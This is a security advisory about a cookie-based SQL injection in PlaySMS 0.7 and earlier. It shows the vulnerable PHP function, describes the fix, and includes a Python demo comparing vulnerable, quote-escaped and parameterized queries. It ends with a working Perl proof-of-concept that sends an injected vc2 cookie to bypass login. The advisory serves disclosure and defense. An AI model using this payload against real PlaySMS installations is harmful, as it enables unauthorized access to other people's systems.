PlaySMS SQL Injection via Cookie

Summary

PlaySMS is ‘a full-featured SMS gateway application that features sending of single or broadcast SMSes, the ability to receive and forward SMSes, an SMS board, an SMS polling system, SMS customs for handling incoming SMSes and forwarding them to custom applications, and SMS commands for saving/retrieving information to/from a server and executing server-side shell scripts’.

An SQL Injection vulnerability in the product allows remote attackers to inject arbitrary SQL statements via the cookie mechanism used by the product.

Credit:

‘The information has been provided by Noam Rathaus.’


Details

Vulnerable Systems:
 * PlaySMS version 0.7 and prior

Immune Systems:
 * PlaySMS version 0.7.1 or newer

Vulnerable code:
The vulnerability is located in the function valid():

function valid($var_ticket="", $var_username="")
{
    // Ticket and username are taken straight from the vc1/vc2 cookies
    // unless explicit values were passed in by the caller
    $ticket = $_COOKIE['vc1'];
    $username = $_COOKIE['vc2'];
    if ($var_ticket && $var_username)
    {
        $ticket = $var_ticket;
        $username = $var_username;
    }
    // $username is interpolated into the SQL text without any escaping
    $db_query = "SELECT ticket FROM tblUser WHERE username='$username'";
    $db_result = dba_query($db_query);
    $db_row = dba_fetch_array($db_result);
    if ($ticket && $db_row['ticket'] && ($ticket == $db_row['ticket']))
    {
        return 1;
    }
    else
    {
        return 0;
    }
}

As the function shows, the cookie values are used exactly as received. This holds only when the 'magic_quotes_gpc' setting is 'Off' (NOTE: the author of the program discourages this setting in the INSTALL file).

When 'magic_quotes_gpc' is 'Off', the Perl script in the Exploit section below illustrates how fr_left.php can be accessed without providing any username or password.

Solution:
The author of the program has addressed the vulnerability by including code that filters incoming malicious input whenever magic_quotes_gpc is set to 'Off'. In addition, the author handled the case where Microsoft SQL Server is used as the backend, since the normal (backslash-based) filtering is not enough there.

Side note:
Please note that addslashes will NOT work with Microsoft SQL, since Microsoft SQL does not use the backslash character as an escape mechanism. Double the quotes instead, or use this:

function mssql_addslashes($data) {
   // Microsoft SQL escapes a single quote inside a string literal by doubling it
   $data = str_replace("'", "''", $data);
   return $data;
}
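To make the three points above concrete (the cookie value reaching the SQL text unescaped, the quote-doubling escape from the side note, and parameter binding as the fix), here is an added example that is not PlaySMS code and not part of the original advisory. It uses an in-memory SQLite database as a stand-in for the real backend; the user row, the ticket value and the function names are constructed for the demonstration. SQLite, like Microsoft SQL, escapes a quote inside a string literal by doubling it and does not treat backslash as an escape, which is why the side note's technique carries over directly.

```python
import hmac
import sqlite3

# Constructed stand-in for PlaySMS's tblUser; the ticket value is made up.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tblUser (username TEXT, ticket TEXT)")
    db.execute("INSERT INTO tblUser VALUES ('admin', 'constructed-secret-ticket')")
    return db

def lookup_ticket(db, query, params=()):
    row = db.execute(query, params).fetchone()
    return row[0] if row else None

def same_ticket(vc1, stored):
    # Constant-time comparison of the presented and stored ticket strings
    return bool(vc1 and stored and
                hmac.compare_digest(vc1.encode(), stored.encode()))

def valid_vulnerable(db, vc1, vc2):
    """Same construction as the advisory's valid(): the vc2 cookie is pasted
    into the SQL text, so it can close the quote and append a UNION."""
    query = "SELECT ticket FROM tblUser WHERE username='%s'" % vc2
    return same_ticket(vc1, lookup_ticket(db, query))

def valid_quote_doubled(db, vc1, vc2):
    """String building kept, but the cookie is escaped the way the side
    note's mssql_addslashes() does (doubling single quotes). This closes
    the hole for quote-based injection in a quote-doubling dialect, but it
    only works if the escaping is applied at every call site."""
    query = "SELECT ticket FROM tblUser WHERE username='%s'" % vc2.replace("'", "''")
    return same_ticket(vc1, lookup_ticket(db, query))

def valid_parameterized(db, vc1, vc2):
    """Preferred fix: the cookie travels as a bound parameter, never as SQL
    text, so no escaping rule (backslash or quote-doubling) has to be right."""
    stored = lookup_ticket(db, "SELECT ticket FROM tblUser WHERE username=?", (vc2,))
    return same_ticket(vc1, stored)

# URL-decoded form of the vc2 cookie the advisory's PoC sends:
# '%20union%20select%20'ticket  ->  ' union select 'ticket
INJECTED_VC2 = "' union select 'ticket"

def outcomes(vc1, vc2):
    """Return (vulnerable, quote_doubled, parameterized) verdicts for one
    cookie pair, each evaluated against a fresh database."""
    return (valid_vulnerable(make_db(), vc1, vc2),
            valid_quote_doubled(make_db(), vc1, vc2),
            valid_parameterized(make_db(), vc1, vc2))

if __name__ == "__main__":
    print("injected cookie (vulnerable, quote-doubled, parameterized):",
          outcomes("ticket", INJECTED_VC2))
    print("real credentials (vulnerable, quote-doubled, parameterized):",
          outcomes("constructed-secret-ticket", "admin"))
```

Running it shows the injected cookie pair accepted only by the string-building version, while both the quote-doubled and the parameterized versions still accept the genuine username/ticket pair. The lesson for the PlaySMS fix is the same one the Solution section gives: escaping must match the backend's quoting rules, and binding parameters sidesteps that dependency altogether.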

Exploit:
#!/usr/bin/perl
# PlaySMS version 0.7 and prior SQL Injection PoC
# Written by Noam Rathaus of Beyond Security Ltd.
#

use IO::Socket;
use strict;

my $host = $ARGV[0];
die "usage: $0 <host>\n" unless defined $host;

my $remote = IO::Socket::INET->new ( Proto => 'tcp', PeerAddr => $host, PeerPort => '80' );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "connected\n";

$remote->autoflush(1);

# Raw HTTP/1.1 request; the vc2 cookie carries the injected SQL fragment
my $http = "GET /~playsms/fr_left.php HTTP/1.1\r\n" .
  "Host: $host:80\r\n" .
  "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 Firefox/0.9.1\r\n" .
  "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n" .
  "Accept-Language: en-us,en;q=0.5\r\n" .
  "Accept-Encoding: gzip,deflate\r\n" .
  "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" .
  "Keep-Alive: 300\r\n" .
  "Cookie: vc1=ticket; vc2='%20union%20select%20'ticket;\r\n" .
  "Content-Type: application/x-www-form-urlencoded\r\n" .
  "Connection: close\r\n" .
  "\r\n";

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);
print "Sent\n";

# Echo the server's response
while (<$remote>)
{
    print $_;
}
print "\n";

close $remote;

Categories: UNIX